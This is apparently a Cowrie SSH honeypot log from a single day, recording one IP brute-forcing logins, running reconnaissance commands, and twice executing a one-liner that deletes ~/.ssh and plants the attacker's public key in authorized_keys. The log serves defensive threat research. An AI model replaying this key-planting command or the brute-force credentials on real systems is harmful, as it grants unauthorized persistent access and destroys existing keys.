{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:10.490591Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:10.788801Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:11.432544Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T21:54:11.433230Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:11.682410Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd_1234","message":"login attempt [root/Abcd_1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:54:12.124811Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:12.233632Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T21:54:12.234301Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:12.487031Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:12.735083Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:54:12.735927Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:54:12.736691Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:13.052674Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T21:54:13.053520Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:13.055065Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:13.692435Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:54:13.693359Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:54:13.993381Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:13.994427Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:14.015724Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49952,"dst_ip":"1.2.3.4","dst_port":22,"session":"025ae8664f2f","protocol":"ssh","message":"New connection: 212.227.235.229:49952 (1.2.3.4:22) [session: 025ae8664f2f]","sensor":"my-vps","timestamp":"2025-09-08T21:54:14.289700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:14.290360Z","src_ip":"212.227.235.229","session":"025ae8664f2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:14.590865Z","src_ip":"212.227.235.229","session":"025ae8664f2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:14.788072Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T21:54:14.788754Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:15.040435Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:15.597432Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T21:54:15.598114Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:54:15.825129Z","src_ip":"212.227.235.229","session":"025ae8664f2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:16.778023Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.closed","duration":"35.8","message":"Connection lost after 35.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:16.779202Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:17.124404Z","src_ip":"212.227.235.229","session":"025ae8664f2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49966,"dst_ip":"1.2.3.4","dst_port":22,"session":"b699a81cdab4","protocol":"ssh","message":"New connection: 212.227.235.229:49966 (1.2.3.4:22) [session: b699a81cdab4]","sensor":"my-vps","timestamp":"2025-09-08T21:54:17.457641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:17.458618Z","src_ip":"212.227.235.229","session":"b699a81cdab4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:17.774847Z","src_ip":"212.227.235.229","session":"b699a81cdab4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:54:19.077998Z","src_ip":"212.227.235.229","session":"b699a81cdab4"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:19.377066Z","src_ip":"212.227.235.229","session":"7b3b125c7813"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:19.393868Z","src_ip":"212.227.235.229","session":"b699a81cdab4"}
{"eventid":"cowrie.session.closed","duration":31.311198472976685,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:25.712722Z","src_ip":"212.227.235.229","session":"5aee406c6dbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35450,"dst_ip":"1.2.3.4","dst_port":22,"session":"0be9b83c49f4","protocol":"ssh","message":"New connection: 212.227.235.229:35450 (1.2.3.4:22) [session: 0be9b83c49f4]","sensor":"my-vps","timestamp":"2025-09-08T21:54:27.524580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:27.626757Z","src_ip":"212.227.235.229","session":"0be9b83c49f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:28.013636Z","src_ip":"212.227.235.229","session":"0be9b83c49f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41252,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb5dfd8c487d","protocol":"ssh","message":"New connection: 212.227.235.229:41252 (1.2.3.4:22) [session: fb5dfd8c487d]","sensor":"my-vps","timestamp":"2025-09-08T21:54:28.162610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:28.163286Z","src_ip":"212.227.235.229","session":"fb5dfd8c487d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:28.492953Z","src_ip":"212.227.235.229","session":"fb5dfd8c487d"}
{"eventid":"cowrie.login.failed","username":"audit","password":"12345","message":"login attempt [audit/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T21:54:28.848758Z","src_ip":"212.227.235.229","session":"0be9b83c49f4"}
{"eventid":"cowrie.login.failed","username":"pcp","password":"2025","message":"login attempt [pcp/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T21:54:29.845176Z","src_ip":"212.227.235.229","session":"fb5dfd8c487d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:30.053715Z","src_ip":"212.227.235.229","session":"0be9b83c49f4"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:31.175266Z","src_ip":"212.227.235.229","session":"fb5dfd8c487d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56002,"dst_ip":"1.2.3.4","dst_port":22,"session":"27c2cbaa47d3","protocol":"ssh","message":"New connection: 212.227.235.229:56002 (1.2.3.4:22) [session: 27c2cbaa47d3]","sensor":"my-vps","timestamp":"2025-09-08T21:54:34.107704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:34.108673Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:34.280188Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Arditi123","message":"login attempt [root/Arditi123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:54:34.997806Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:35.351130Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:54:35.351820Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:54:35.352654Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:35.522795Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:35.982229Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:54:35.982910Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
